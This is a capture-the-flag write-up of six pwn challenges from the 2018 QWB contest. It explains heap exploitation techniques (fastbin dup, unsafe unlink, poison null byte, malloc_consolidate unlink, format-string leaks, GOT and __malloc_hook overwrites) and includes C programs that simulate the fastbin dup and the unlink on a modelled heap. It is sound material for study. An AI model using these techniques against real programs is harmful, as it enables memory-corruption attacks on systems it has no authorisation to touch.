2018强网杯QWB Writeup



I'll keep writing in English; sorry that the title contains Chinese :-D, because I can't find appropriate words to describe those three Chinese characters.

An excellent capture-the-flag game by the problem setters.
Fortunately I solved six pwn problems.
Now I'll write a short record and summary.

silent

A simple fastbin attack problem with a use-after-free vulnerability.
The double free triggers a fastbin dup, which is used to overwrite got['free'] with plt['system'].

No more detailed description.
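As an added example (not the challenge binary or the author's exploit), the C program below models the fastbin dup on a simulated fastbin, together with the two glibc 2.23 checks that shape the exploit: free() refuses a chunk that is already at the top of its bin, which is why the frees must go a, b, a rather than a, a; and malloc() refuses a chunk whose size field does not decode to the requested bin, which is why the fake fd must point to memory that carries a suitable size word 8 bytes in. The chunk layout and size-class math assume 64-bit glibc 2.23 without tcache; `fake_got` stands in for the real target (the pointer table or GOT region in silent).

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define SIZE_BITS 0x7
#define NFASTBINS 7
/* 64-bit fastbin index: chunk sizes 0x20..0x80 map to bins 0..6 (assumed glibc 2.23 layout) */
#define FASTBIN_IDX(sz) ((unsigned)(((sz) >> 4) - 2))

struct chunk {
    size_t prev_size;
    size_t size;
    struct chunk *fd;
    struct chunk *bk;
};

static struct chunk *fastbin[NFASTBINS];   /* model of the arena's fastbinsY[] */
static struct chunk fake_got;              /* stand-in for the real target memory */

/* free() fast path: reject a chunk already on top of its bin, else push it.
 * Returns 0 where glibc aborts with "double free or corruption (fasttop)". */
int sim_free(struct chunk *p)
{
    unsigned idx = FASTBIN_IDX(p->size & ~(size_t)SIZE_BITS);
    if (idx >= NFASTBINS || fastbin[idx] == p)
        return 0;
    p->fd = fastbin[idx];
    fastbin[idx] = p;
    return 1;
}

/* malloc() fast path: pop the bin head, but only if its size field decodes
 * to the same bin.  Returns NULL where glibc aborts with
 * "malloc(): memory corruption (fast)" or where the bin is empty. */
struct chunk *sim_malloc(size_t chunk_size)
{
    unsigned idx = FASTBIN_IDX(chunk_size);
    if (idx >= NFASTBINS)
        return NULL;
    struct chunk *victim = fastbin[idx];
    if (!victim)
        return NULL;
    if (FASTBIN_IDX(victim->size & ~(size_t)SIZE_BITS) != idx)
        return NULL;
    fastbin[idx] = victim->fd;
    return victim;
}

/* Runs the dup on two 0x70 chunks.  consecutive != 0 frees a twice in a
 * row (stopped by the fasttop check); otherwise the order is a, b, a.
 * fake_size is the size word planted 8 bytes into the target.  Returns
 * whatever the fourth malloc hands back: &fake_got on success, else NULL. */
struct chunk *fastbin_dup(int consecutive, size_t fake_size)
{
    memset(fastbin, 0, sizeof fastbin);
    memset(&fake_got, 0, sizeof fake_got);
    fake_got.size = fake_size;

    unsigned char *heap = calloc(1, 0x200);    /* simulated heap */
    if (!heap)
        return NULL;
    struct chunk *a = (struct chunk *)heap;
    struct chunk *b = (struct chunk *)(heap + 0x70);
    struct chunk *result = NULL;
    a->size = 0x71;
    b->size = 0x71;

    int ok = sim_free(a) && (consecutive ? 1 : sim_free(b)) && sim_free(a);
    if (ok) {
        /* bin is now a -> b -> a: take a back and plant the fake fd in it */
        struct chunk *p = sim_malloc(0x70);    /* == a */
        p->fd = &fake_got;                     /* the write the UAF gives us */
        sim_malloc(0x70);                      /* b */
        sim_malloc(0x70);                      /* a again */
        result = sim_malloc(0x70);             /* &fake_got, or NULL if size check fails */
    }
    free(heap);
    return result;
}
```

A size word of 0x7f passes for the 0x70 bin just as 0x70 does, because only the bin index of the masked size is compared; that is why real targets near the GOT or __malloc_hook are usually picked at an offset where a libc pointer's 0x7f byte lines up with the size field.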

silent2

The only difference from silent is that the allocation size must be larger than 0x80, which rules out fastbins and leaves smallbins or largebins.

The use-after-free exists as before, so consider using the double free to trigger unlink and get an arbitrary 8-byte write.
Unsafe unlink makes the pointer point into the .bss section, and the following steps are the same as in silent.
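As an added example (not the challenge or the author's exploit), the C program below models the unsafe unlink that silent2 relies on. The .bss pointer table, two adjacent heap chunks and the backward-consolidation path of free() are simulated, so it runs on any 64-bit host without the vulnerable binary. It assumes 8-byte pointers and the glibc 2.23 chunk layout (prev_size, size, fd, bk); the list check is glibc's own condition, and the size-vs-prev_size check that glibc 2.26 added is included to show the fake chunk satisfies it too. Other checks in free() are not modelled. The program's edit function is modelled as a memcpy through the table entry, and `target` stands in for the GOT entry.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define PREV_INUSE 0x1
#define SIZE_BITS  0x7

struct chunk {
    size_t prev_size;
    size_t size;
    struct chunk *fd;
    struct chunk *bk;
};

/* Model of the program's .bss: pad[] is whatever lives in the 0x18 bytes
 * below the pointer table, ptr[] is the table the program indexes. */
struct {
    struct chunk *pad[3];
    struct chunk *ptr[2];
} bss;

static uint64_t target;   /* stand-in for the GOT entry we want to overwrite */

/* glibc unlink(): FD->bk and BK->fd must both point back at P.
 * Returns 0 where glibc aborts with "corrupted double-linked list". */
int simulated_unlink(struct chunk *p)
{
    struct chunk *fd = p->fd, *bk = p->bk;
    if (fd->bk != p || bk->fd != p)
        return 0;
    fd->bk = bk;
    bk->fd = fd;
    return 1;
}

/* Backward consolidation in free(): with PREV_INUSE clear, the chunk
 * prev_size bytes back is unlinked.  The size comparison is the check
 * glibc 2.26 added ("corrupted size vs. prev_size"). */
int simulated_free(struct chunk *c)
{
    if (c->size & PREV_INUSE)
        return 0;
    struct chunk *prev = (struct chunk *)((char *)c - c->prev_size);
    if ((prev->size & ~(size_t)SIZE_BITS) != c->prev_size)
        return 0;
    return simulated_unlink(prev);
}

/* silent2 layout: two 0x90 chunks, ptr[0] holding chunk0's user pointer.
 * A fake free chunk is written into chunk0's user data with fd/bk aimed
 * 0x18/0x10 bytes below ptr[0], and chunk1's header is patched so that
 * free(chunk1) unlinks the fake chunk.  bad != 0 puts fd one pointer off,
 * which the list check catches.  Returns the new ptr[0], or NULL. */
struct chunk *run_unsafe_unlink(int bad)
{
    unsigned char *heap = calloc(1, 0x120);   /* simulated heap */
    if (!heap)
        return NULL;
    struct chunk *chunk0 = (struct chunk *)heap;
    struct chunk *chunk1 = (struct chunk *)(heap + 0x90);
    struct chunk *fake = (struct chunk *)(heap + 0x10);   /* chunk0's user data */

    chunk0->size = 0x91;
    chunk1->size = 0x91;
    memset(&bss, 0, sizeof bss);
    bss.ptr[0] = fake;                 /* program stores malloc's return value */

    fake->prev_size = 0;
    fake->size = 0x80;                 /* distance from fake to chunk1 */
    fake->fd = (struct chunk *)((char *)&bss.ptr[0] - 0x18 + (bad ? 8 : 0)); /* fd->bk == &ptr[0] */
    fake->bk = (struct chunk *)((char *)&bss.ptr[0] - 0x10);                 /* bk->fd == &ptr[0] */

    chunk1->prev_size = 0x80;          /* points back at fake */
    chunk1->size = 0x90;               /* PREV_INUSE cleared */

    int ok = simulated_free(chunk1);
    free(heap);
    return ok ? bss.ptr[0] : NULL;     /* on success: &ptr[0] - 0x18 */
}

/* What the unlink buys: ptr[0] now points 0x18 bytes below itself, so an
 * edit of entry 0 with 0x18 bytes of padding plus an address rewrites
 * ptr[0], and the next edit of entry 0 writes to that address.
 * Returns 1 if value landed in target. */
int arbitrary_write(uint64_t value)
{
    struct chunk *base = run_unsafe_unlink(0);
    if (!base)
        return 0;
    unsigned char payload[0x20];
    memset(payload, 'A', 0x18);                        /* fills pad[0..2] */
    uint64_t *t = &target;
    memcpy(payload + 0x18, &t, sizeof t);              /* becomes ptr[0] */
    memcpy((char *)base, payload, sizeof payload);     /* edit(0, payload) */
    memcpy((char *)bss.ptr[0], &value, sizeof value);  /* edit(0, value) */
    return target == value;
}
```

In silent2 the address planted at offset 0x18 of the first edit is got['free'], and the second edit writes plt['system'] there; the list check is the reason the fake chunk must start exactly at the user pointer the table already holds.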

By the way, neither problem has stable output because of system("cat banner.txt"); we can't predict the content of banner.txt, so sometimes it makes the remote connection fail.

As shown below, adding a sleep and using zio make the remote connection more stable. e…

raisepig

If I'm not mistaken, raisepig is adapted from Pwnable.tw Secret Garden.
Refer to my lucky writeup: Pwnable.tw secretgarden

I'm confused about one_gadgets in the local environment versus the remote environment: a one_gadget that succeeded locally failed remotely.
Luckily, triggering malloc_printerr makes the one_gadget work in both environments.

gamebox

Predictable RNG + poison null byte + fastbin corruption.
I guess it was adapted from Pwnable.tw Secret Of My Heart; it looks a little similar.

First, we can predict every role's cookie and store them up.

Then, there are two vulnerabilities:

  • An obvious format string in the show function.
  • An off-by-one when creating a role.

  1. Use the format string to leak a program address and a libc address, bypassing PIE and ASLR.
  2. Exploit the predictable RNG to calculate every role's cookie.
  3. Use the poison null byte technique to create an overlapping chunk.
  4. Use fastbin corruption to overwrite __malloc_hook with a one_gadget.

In the end, try different one_gadgets, and even change the approach, to GET SHELL. :-D

opm

An obvious stack overflow with two gets calls, but it takes a little skill to make use of it.

If we smash the stack directly, we destroy v6 in the stack frame, which stores a heap address, and cause an error.
So we have to do a partial overwrite.
The structure of the roles is as follows:

A program address and a heap address are stored in it, so my idea is to leak the heap address and change the pointer to leak a program address, then bypass PIE.

The first gets overflow can be used to shift the position of the structure, and the second one to leak; the strategy for leaking the heap address is as follows:

  1. Overflow 2 bytes (one controlled byte plus the "\x00" that gets leaves at the end of the string) to write a role structure at a known address.
  2. Overflow 1 byte "\x00" to write the heap address into role->name, with the structure known to us from step 1.
  3. Use the second gets to overflow 2 bytes to the known address and leak the heap address.
    :-D… A little puzzled? I'll show you the code.

The remaining work is easy: leak a libc address, hijack the GOT table, and so on.

note

malloc_consolidate unlink.
I first met this technique in Prediy CTF, although it was a little different there: ReeHY.
Briefly, the vulnerability is also an off-by-one, in the title function.

We can overwrite the next chunk's size with a filter char, as below:

We chose @ (0x40) in preparation for the unlink, so that the chunk looks like a fastbin chunk of size 0x40.
Lay out a fake chunk in the heap as shown in my scenario and trigger malloc_consolidate to unlink our fake fastbin chunk.
In the end, use the result of the unlink for arbitrary reading and writing.
Thanks to myself, I got the flag at 8:55 pm, and the competition finished at 9:00 pm.
Emmm. Don't give up..

Great regret for the two Linux kernel exploit problems, core and solid_core. As a beginner in Linux kernel exploitation, my lack of debugging experience drove me crazy when my exp.c went wrong.
Thank you to my seniors for organizing such a magnificent competition; I'll catch up with all of you!
